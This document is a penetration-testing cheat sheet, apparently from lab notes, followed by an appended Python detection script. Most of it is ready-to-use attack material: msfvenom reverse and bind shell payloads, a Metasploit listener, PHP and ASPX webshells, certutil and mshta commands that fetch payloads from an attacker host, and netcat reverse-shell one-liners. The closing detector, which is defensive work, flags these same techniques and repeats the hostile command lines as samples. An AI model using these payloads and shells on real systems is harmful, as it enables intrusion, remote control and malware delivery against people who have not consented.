Shells & Payloads
msfvenom - Payload Generation
| Command | Description |
|---|---|
| msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f exe > shell.exe | Windows x64 Meterpreter reverse TCP. |
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f exe > shell.exe | Windows x86 Meterpreter reverse TCP. |
| msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=<target_IP> LPORT=<port> -f exe > shell.exe | Windows bind TCP (Metasploit connects to target). |
| msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f elf > shell.elf | Linux x64 Meterpreter reverse TCP. |
| msfvenom -p cmd/unix/bind_perl LHOST=<target_IP> LPORT=<port> -f raw > shell.pl | Linux bind Perl shell (lightweight, no dependencies). |
| msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f raw > shell.php | PHP Meterpreter reverse TCP. |
| msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f asp > shell.asp | ASP reverse shell (IIS). |
| msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<port> -f raw > shell.jsp | JSP reverse shell. |
| msfvenom -l payloads \| grep <keyword> | Search available payloads. |
| msfvenom -p <payload> --list-options | Show payload options. |
Metasploit Listener
```
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <your_IP>
set LPORT 4444
exploit -j
```
PHP Webshells
```
# Simple command execution
<?php system($_GET['cmd']); ?>
# Via POST
<?php system($_POST['cmd']); ?>
# Usage:
# curl http://<IP>/shell.php?cmd=whoami
# curl http://<IP>/shell.php?cmd=id
```
ASPX Webshell (IIS / Windows)
The cmdasp.aspx webshell (pre-installed in some lab environments) accepts commands via a form field. Access it via a browser or curl and run OS commands as the IIS application pool user (often SYSTEM).
```
# Download payload to target from ASPX webshell:
certutil -urlcache -split -f http://<kali_IP>:8080/shell.exe C:\Windows\Temp\shell.exe
# Execute it:
C:\Windows\Temp\shell.exe
```
File Transfer - Serving Payloads
| Command | Description |
|---|---|
| python3 -m http.server 8080 | Serve current directory over HTTP on port 8080. |
| python2 -m SimpleHTTPServer 8080 | Python 2 equivalent. |
| certutil -urlcache -split -f http://<IP>:8080/<file> <dest> | Download file on Windows (no PowerShell needed). |
| powershell -c "Invoke-WebRequest http://<IP>:8080/<file> -OutFile <dest>" | PowerShell download. |
| wget http://<IP>:8080/<file> -O <dest> | Download on Linux. |
| curl http://<IP>:8080/<file> -o <dest> | Download with curl. |
Netcat Shells
| Command | Description |
|---|---|
| nc -lvnp <port> | Start netcat listener. |
| nc <IP> <port> -e /bin/bash | Netcat reverse shell (Linux, if -e available). |
| rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f \| /bin/bash -i 2>&1 \| nc <IP> <port> > /tmp/f | Netcat reverse shell without -e flag. |
| nc <IP> <port> | Connect to a bind shell. |
Shell Stabilization (Linux)
After getting a basic shell, stabilize it for full interactivity:
```
# Method 1 - Python PTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# or
python -c 'import pty; pty.spawn("/bin/bash")'
# Then:
Ctrl+Z
stty raw -echo; fg
export TERM=xterm
```
```
# Method 2 - script
script /dev/null -c bash
```
Shell Upgrade - Meterpreter
| Command | Description |
|---|---|
| sessions -u <id> | Upgrade a shell session to Meterpreter. |
| post/multi/manage/shell_to_meterpreter | Post module to upgrade shell to Meterpreter. |
HTA Server - Windows Payload Delivery
```
# Metasploit - serves HTA and catches the session
use exploit/windows/misc/hta_server
set LHOST <kali_IP>
set LPORT 4446
run
```
```
# Trigger from a Windows webshell:
mshta http://<kali_IP>:8080/<random>.hta
```
Useful when you already have command execution (e.g., ASPX webshell) and need a full Meterpreter session.
Common Bind vs Reverse Decision
| Situation | Use |
|---|---|
| Target can reach Kali | Reverse shell (target calls back) |
| Target is behind NAT or on isolated network | Bind shell (Kali connects to target) |
| Internal host through Meterpreter pivot | Bind payload - reverse cannot reach Kali DMZ IP |
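The commands above are exactly what shows up in process-creation telemetry on a compromised host, so the detection side is worth having next to the cheat sheet. This is an added example, not part of the original page or of Metasploit: a small rule set that flags the target-side techniques listed here (certutil download, remote HTA via mshta, netcat -e and mkfifo reverse shells, PTY upgrades) over constructed sample command lines; the sample lines and rule names are hypothetical.

```python
import re

# Constructed sample process command lines (hypothetical EDR/auditd telemetry, not real data).
SAMPLE_CMDLINES = [
    r"certutil -urlcache -split -f http://10.0.0.5:8080/shell.exe C:\Windows\Temp\shell.exe",
    "mshta http://10.0.0.5:8080/x7Lq.hta",
    "nc 10.0.0.5 4444 -e /bin/bash",
    "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.0.0.5 4444 > /tmp/f",
    "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "script /dev/null -c bash",
    "certutil -verify cert.cer",                 # benign certutil use, must not fire
    "mshta C:\\Program Files\\App\\setup.hta",   # local HTA, no remote fetch
    "python3 manage.py runserver",              # unrelated python invocation
]

# Each rule: (name, compiled regex). Patterns mirror the techniques in the cheat sheet above.
RULES = [
    ("certutil-download",   re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*-f\b.*https?://", re.I)),
    ("mshta-remote-hta",    re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I)),
    ("netcat-exec-shell",   re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s+/bin/(ba)?sh", re.I)),
    ("mkfifo-netcat-shell", re.compile(r"\bmkfifo\b.*\|\s*(nc|ncat|netcat)\b", re.I)),
    ("pty-spawn-upgrade",   re.compile(r"\bpty\.spawn\(", re.I)),
    ("script-pty-upgrade",  re.compile(r"\bscript\s+/dev/null\s+-c\s+(ba)?sh\b", re.I)),
]

def classify(cmdline):
    """Return the names of every rule matched by one process command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(cmdlines):
    """Map each flagged command line to its matched rule names; lines matching nothing are omitted."""
    hits = {}
    for line in cmdlines:
        matched = classify(line)
        if matched:
            hits[line] = matched
    return hits

if __name__ == "__main__":
    for line, names in scan(SAMPLE_CMDLINES).items():
        print(f"{', '.join(names):22} {line}")
```

In production these would be tuned against the environment's normal certutil and mshta usage, but the six patterns are narrow enough that the benign sample lines do not fire.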